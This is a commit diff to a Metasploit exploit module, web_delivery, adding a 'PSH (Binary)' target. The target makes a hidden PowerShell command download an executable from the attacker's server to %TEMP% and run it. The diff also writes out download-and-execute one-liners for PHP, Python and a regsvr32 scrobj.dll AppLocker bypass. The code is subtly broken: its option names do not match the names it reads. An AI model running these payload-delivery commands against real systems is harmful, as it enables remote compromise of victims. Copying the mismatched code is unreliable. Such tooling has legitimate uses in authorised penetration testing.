Add PSH (Binary) as a target to web_delivery
parent
96f7012fe7
commit
accb77d268
|
@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell'
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::EXE
|
||||||
include Msf::Exploit::Powershell
|
include Msf::Exploit::Powershell
|
||||||
include Msf::Exploit::Remote::HttpServer
|
include Msf::Exploit::Remote::HttpServer
|
||||||
|
|
||||||
|
@ -31,6 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
|
The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
|
||||||
PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
|
PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
|
||||||
can occur on the same port.
|
can occur on the same port.
|
||||||
|
|
||||||
|
"PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
|
||||||
),
|
),
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -40,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
|
'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
|
||||||
'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
|
'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
|
||||||
'Trenton Ivey', # AppLocker MSF Module (kn0)
|
'Trenton Ivey', # AppLocker MSF Module (kn0)
|
||||||
|
'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
|
@ -71,6 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
['Regsvr32', {
|
['Regsvr32', {
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => [ARCH_X86, ARCH_X64]
|
'Arch' => [ARCH_X86, ARCH_X64]
|
||||||
|
}],
|
||||||
|
['PSH (Binary)', {
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Arch' => [ARCH_X86, ARCH_X64]
|
||||||
}]
|
}]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
@ -79,32 +87,43 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptBool.new('PSH-Proxy', [ true, 'PowerShell - Use the system proxy', true ])
|
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
|
||||||
|
OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
|
||||||
|
OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
|
||||||
], self.class
|
], self.class
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def primer
|
def primer
|
||||||
url = get_uri
|
php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
|
||||||
|
python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
|
||||||
|
regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
|
||||||
|
|
||||||
print_status("Run the following command on the target machine:")
|
print_status("Run the following command on the target machine:")
|
||||||
case target.name
|
case target.name
|
||||||
when 'PHP'
|
when 'PHP'
|
||||||
print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));"))
|
print_line("#{php}")
|
||||||
when 'Python'
|
when 'Python'
|
||||||
print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());"))
|
print_line("#{python}")
|
||||||
when 'PSH'
|
when 'PSH'
|
||||||
print_line(gen_psh(url))
|
psh = gen_psh("#{get_uri}", "string")
|
||||||
|
print_line("#{psh}")
|
||||||
when 'Regsvr32'
|
when 'Regsvr32'
|
||||||
print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
|
print_line("#{regsvr}")
|
||||||
|
when 'PSH (Binary)'
|
||||||
|
psh = gen_psh("#{get_uri}", "download")
|
||||||
|
print_line("#{psh}")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def on_request_uri(cli, _request)
|
def on_request_uri(cli, _request)
|
||||||
if _request.raw_uri =~ /\.sct$/
|
if _request.raw_uri =~ /\.sct$/
|
||||||
psh = gen_psh(get_uri)
|
psh = gen_psh("#{get_uri}", "string")
|
||||||
data = gen_sct_file(psh)
|
data = gen_sct_file(psh)
|
||||||
|
elsif target.name.include? 'PSH (Binary)'
|
||||||
|
data = generate_payload_exe
|
||||||
elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
|
elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
|
||||||
data = cmd_psh_payload(payload.encoded,
|
data = cmd_psh_payload(payload.encoded,
|
||||||
payload_instance.arch.first,
|
payload_instance.arch.first,
|
||||||
|
@ -125,10 +144,34 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def gen_psh(url)
|
def gen_psh(url, *method)
|
||||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||||
|
|
||||||
|
if method.include? 'string'
|
||||||
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
|
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
|
||||||
download_and_run = "#{ignore_cert}#{download_string}"
|
download_and_run = "#{ignore_cert}#{download_string}"
|
||||||
|
else
|
||||||
|
# Random filename to use, if there isn't anything set
|
||||||
|
random = "#{rand_text_alphanumeric 8}.exe"
|
||||||
|
|
||||||
|
# Set filename (Use random filename if empty)
|
||||||
|
filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
|
||||||
|
|
||||||
|
# Set path (Use %TEMP% if empty)
|
||||||
|
path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
|
||||||
|
|
||||||
|
# Join Path and Filename
|
||||||
|
file = %Q(echo (#{path}+'\\#{filename}'))
|
||||||
|
|
||||||
|
# Generate download PowerShell command
|
||||||
|
#download_string = Rex::Powershell::PshMethods.download(url, "$z") # Can't use, due to single vs double quotes in the URL
|
||||||
|
download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^
|
||||||
|
|
||||||
|
# Join PowerShell commands up
|
||||||
|
download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z"
|
||||||
|
end
|
||||||
|
|
||||||
|
# Generate main PowerShell command
|
||||||
return generate_psh_command_line(noprofile: true,
|
return generate_psh_command_line(noprofile: true,
|
||||||
windowstyle: 'hidden',
|
windowstyle: 'hidden',
|
||||||
command: download_and_run
|
command: download_and_run
|
||||||
|
|
Loading…
Reference in New Issue